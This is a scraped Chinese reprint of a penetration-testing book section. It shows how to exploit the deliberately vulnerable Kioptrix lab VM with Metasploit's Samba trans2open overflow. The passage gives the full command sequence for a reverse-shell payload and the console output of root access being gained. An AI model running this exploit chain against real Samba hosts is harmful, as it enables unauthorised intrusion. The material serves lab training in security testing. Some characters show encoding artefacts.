4.6.3 使用Metasploit對Kioptrix進(jìn)行漏洞利用
本文關(guān)鍵詞:高度安全環(huán)境下的高級滲透測試,由筆耕文化傳播整理發(fā)布。
> 高度安全環(huán)境下的高級滲透測試 4.6.3 使用Metasploit對Kioptrix進(jìn)行漏洞利用 2014-09-04 16:52:23 我要投稿
本文所屬圖書 > 高度安全環(huán)境下的高級滲透測試
本書是一本介紹高級安全滲透測試的安全技術(shù)圖書,采用步驟方式講解了在安全環(huán)境下進(jìn)行滲透測試的相關(guān)技術(shù)、工具和知識。本書分為11章,分別講解了如何計劃和界定一次成功的滲透測試,用來進(jìn)行偵查以求獲取信息的 立即去當(dāng)當(dāng)網(wǎng)訂購
現(xiàn)在是時候介紹如何使用Metasploit來攻擊我們的Kioptrix虛擬機了。我們已經(jīng)學(xué)會了如何對網(wǎng)上提供的POC代碼進(jìn)行編譯和使用,現(xiàn)在來看看Metasploit中的實現(xiàn)方式,這樣能節(jié)約大量的時間。首先我們需要連接到數(shù)據(jù)庫。
# msfconsole
msf > db_connect postgres:myPassword@127.0.0.1/pentester
在數(shù)據(jù)庫中我們已經(jīng)獲得了目標(biāo)系統(tǒng)的相關(guān)信息。你可以使用services命令查看:
msf > services
命令的輸出結(jié)果如下:
Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.75.14 22 tcp ssh open 192.168.75.14 80 tcp http open 192.168.75.14 111 udp rpcbind open 192.168.75.14 111 tcp rpcbind open 192.168.75.14 137 udp netbios-ns open 192.168.75.14 139 tcp netbios-ssn open 192.168.75.14 443 tcp https open 192.168.75.14 32768 tcp filenet-tms open 192.168.75.14 32768 udp omad open可以看到我們先前利用的samba 139端口仍然開放,F(xiàn)在來看看在不必處理漏洞利用代碼的情況下,我們使用Metasploit能做的事情。
msf> search samba
結(jié)果如圖4.13所示。
模塊名:確定需要使用的漏洞利用模塊之后,可以使用USE命令后接模塊名來進(jìn)行使用。
發(fā)布時間:發(fā)布時間是社區(qū)或廠商獲得漏洞信息的實際時間,而不是相關(guān)POC代碼的發(fā)布時間。
排名:漏洞的排名非常重要,可以獲得漏洞可靠程度的信息。
描述:描述漏洞的類型。
我們將使用 trans2open 漏洞利用模塊,,其使用與本章之前介紹的掃描模塊類似。在msfconsole中輸入:
msf > use exploit/linux/samba/trans2open
我們可能需要了解模塊的更多信息,這時可以使用info命令來顯示:
msf exploit(trans2open) > info Name: Samba trans2open Overflow (Linux x86) Module: exploit/linux/samba/trans2open Version: 12196 Platform: Linux Privileged: Yes License: Metasploit Framework License (BSD) Rank: Great Provided by: hdm <hdm@metasploit.com> jduck <jduck@metasploit.com> Available targets: Id Name -- ---- 0 Samba 2.2.x - Bruteforce Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port Payload information: Space: 1024 Avoid: 1 characters Description: This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC. References: ?name=2003-0201Metasploit的所有漏洞利用模塊都有類似的信息。如果時間允許,應(yīng)該多花時間熟悉一下常用的漏洞利用模塊,以避免使用的模塊在目標(biāo)系統(tǒng)環(huán)境下不起作用的情況發(fā)生。
現(xiàn)在我們需要設(shè)置一些選項:
msf > set RHOST 192.168.75.14
RHOST是遠(yuǎn)程目標(biāo)主機,我們將其設(shè)置為Kioptrix虛擬機的IP地址。
msf > show payloads
如圖4.14所示,show payloads 命令顯示可供當(dāng)前模塊使用的所有攻擊載荷的列表。這里我們以使用reverse_tcp為例。這種攻擊載荷短小而有效,但不具備像Meterpreter那樣強大的功能。
> set payload linux/x86/shell/reverse_tcp
我們同樣需要設(shè)置LHOST和LPORT。
> set LHOST 192.168.75.12
這是我們需要監(jiān)聽的本地地址。
> set LPORT 2222
這里設(shè)置為需要監(jiān)聽的端口。
現(xiàn)在設(shè)置已經(jīng)完成,我們可以執(zhí)行模塊:
> exploit
如果一切按計劃進(jìn)行,你將看到如下的輸出信息,然后獲得類似于本章之前手動編譯漏洞利用代碼時獲得的Shell會話連接。
msf exploit(trans2open) > exploit [*] Started reverse handler on 192.168.75.12:2221 [*] Trying return address 0xbffffdfc... [*] Trying return address 0xbffffcfc... [*] Trying return address 0xbffffbfc... [*] Trying return address 0xbffffafc... [*] Sending stage (36 bytes) to 192.168.75.14 [*] Command shell session 2 opened (192.168.75.12:2221 -> 192.168.75.14:32802) at 2011-11-16 23:22:06 -0500執(zhí)行下面的指令,以確保我們擁有root權(quán)限:
# mail Mail version 8.1 6/6/93.Type ? for help. "/var/mail/root": 6 messages 6 unread >U 1 root@kioptix.level1 Sat Sep 26 11:42 15/481 "About Level 2" U 2 root@kioptrix.level1 Thu Nov 10 19:34 19/534 "LogWatch for kioptrix" U 3 root@kioptrix.level1 Fri Nov 11 14:38 48/1235 "LogWatch for kioptrix" U 4 root@kioptrix.level1 Sun Nov 13 15:12 19/534 "LogWatch for kioptrix" U 5 root@kioptrix.level1 Mon Nov 14 18:23 244/12279 "LogWatch for kioptrix" U 6 root@kioptrix.level1 Wed Nov 16 15:19 19/534 "LogWatch for kioptrix"在給root賬號的留言中,可以看到Loneferret給我們留言的一條好消息,輸入1讀。
# 1 Message 1: From root Sat Sep 26 11:42:10 2009 Date:Sat, 26 Sep 2009 11:42:10 -0400 From: root <root@kioptix.level1> To: root@kioptix.level1 Subject:About Level 2 If you are reading this, you got root.Congratulations. Level 2 won't be as easy...從最后的這項練習(xí)可以清楚地看到,相比手動查找和編譯代碼,使用Metasploit是多么輕而易舉的一件事情。你甚至還能將你自己的模塊和編譯的代碼添加到Metasploit框架中。
點擊復(fù)制鏈接 與好友分享!回本站首頁 您對本文章有什么意見或著疑問嗎?請到論壇討論您的關(guān)注和建議是我們前行的參考和動力 上一篇:4.6.2 Metasploit和數(shù)據(jù)庫 下一篇:4.7 總結(jié) 相關(guān)文章內(nèi)核漏洞的利用與防范
內(nèi)存破壞漏洞
內(nèi)核棧漏洞
內(nèi)核堆漏洞
1.2.1 計算機漏洞的性質(zhì)
1.2.2 計算機漏洞分類
漏洞管理
1.2 漏洞管理的起源
1.5 漏洞的來源
1.6 有缺陷的漏洞管理示例
圖文推薦本文關(guān)鍵詞:高度安全環(huán)境下的高級滲透測試,由筆耕文化傳播整理發(fā)布。
本文編號:289669
本文鏈接:http://sikaile.net/wenshubaike/mishujinen/289669.html